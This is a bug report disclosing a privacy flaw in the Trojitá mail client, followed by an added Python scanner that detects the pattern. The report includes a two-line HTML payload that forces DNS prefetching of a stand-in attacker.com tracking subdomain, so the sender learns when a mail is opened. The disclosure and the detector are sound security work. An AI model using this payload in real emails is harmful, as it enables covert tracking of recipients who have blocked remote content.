https://bugs.kde.org/show_bug.cgi?id=390452
Bug ID: 390452
Summary: HTML Backchannel in Trojitá Mail Client: DNS Prefetching
Product: trojita
Version: unspecified
Platform: Other
OS: Linux
Status: UNCONFIRMED
Severity: normal
Priority: NOR
Component: Core
Assignee: trojita-b...@kde.org
Reporter: jens.a.mueller+...@rub.de
Target Milestone: ---

Created attachment 110652
  --> https://bugs.kde.org/attachment.cgi?id=110652&action=edit
HTML Backchannel in Trojitá Mail Client: DNS Prefetching

Dear Trojitá Devs,

In the scope of academic research within the efail project, in cooperation with
Ruhr-University Bochum and FH Münster, Germany, we systematically analyzed
Trojitá for `web bugs' and other backchannels which have an impact on the
user's privacy. The results are as follows.

*** Introduction ***

It is well known that spammers abuse `web bugs' -- 1x1 pixel images in HTML
emails -- to track if their mails to a certain address are actually read. To
respect the privacy of their customers, most email clients, by default, block
external content. However, we found a bypass for remote content blocking in
Trojitá.

*** The Impact ***

The issue allows the sender of an email to leak information such as:

- if and when the mail has been read
- the number of users on a mailing list

*** The Bypass ***

The following HTML email triggers a DNS request to the DNS server responsible
for tracking-id.attacker.com when the email is opened in Trojitá (without any
user interaction required):

    <meta http-equiv="x-dns-prefetch-control" content="on">
    <a href="http://tracking-id.attacker.com"></a>

Note that it is easy to set up a DNS server controlled by the spammer
responsible for her own domain, attacker.com, and all its subdomains.

Greetings,
Jens
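
A check for the pattern described in the report above, as an added example that is not part of the original report or of Trojitá's code: it scans the text/html parts of a message for the `x-dns-prefetch-control` opt-in and lists the link hosts that would then be resolved when the mail is opened. The function names and the sample messages are constructed for illustration, and the check assumes the meta opt-in is what enables the lookups.

```python
from email import message_from_string
from html.parser import HTMLParser
from urllib.parse import urlsplit


class PrefetchScanner(HTMLParser):
    """Records a DNS-prefetch opt-in and every external host named in a link."""

    def __init__(self):
        super().__init__()
        self.prefetch_on = False
        self.hosts = set()

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "x-dns-prefetch-control":
            if a.get("content", "").strip().lower() == "on":
                self.prefetch_on = True
        elif tag in ("a", "area") and a.get("href"):
            try:
                url = urlsplit(a["href"].strip())
            except ValueError:  # malformed URL, nothing to resolve
                return
            # Absolute and protocol-relative links carry a host name.
            if url.hostname and url.scheme in ("http", "https", ""):
                self.hosts.add(url.hostname)


def scan_message(raw):
    """Return the sorted host names a mail could leak through DNS prefetching."""
    leaked = set()
    for part in message_from_string(raw).walk():
        if part.get_content_type() != "text/html":
            continue
        body = part.get_payload(decode=True)
        html = body.decode(part.get_content_charset() or "utf-8", "replace")
        scanner = PrefetchScanner()
        scanner.feed(html)
        scanner.close()
        if scanner.prefetch_on:  # hosts only count once prefetching is forced on
            leaked |= scanner.hosts
    return sorted(leaked)


# Constructed sample built around the two HTML lines quoted in the report.
SAMPLE = ("From: sender@example.org\nSubject: constructed sample\n"
          "MIME-Version: 1.0\nContent-Type: text/html; charset=utf-8\n\n"
          '<meta http-equiv="x-dns-prefetch-control" content="on">\n'
          '<a href="http://tracking-id.attacker.com"></a>\n')
CONTROL = SAMPLE.replace('content="on"', 'content="off"')  # constructed control
```

A mail filter or a client's pre-render step could use a non-empty result to strip the meta element or to neutralise the listed links before the HTML reaches the rendering engine.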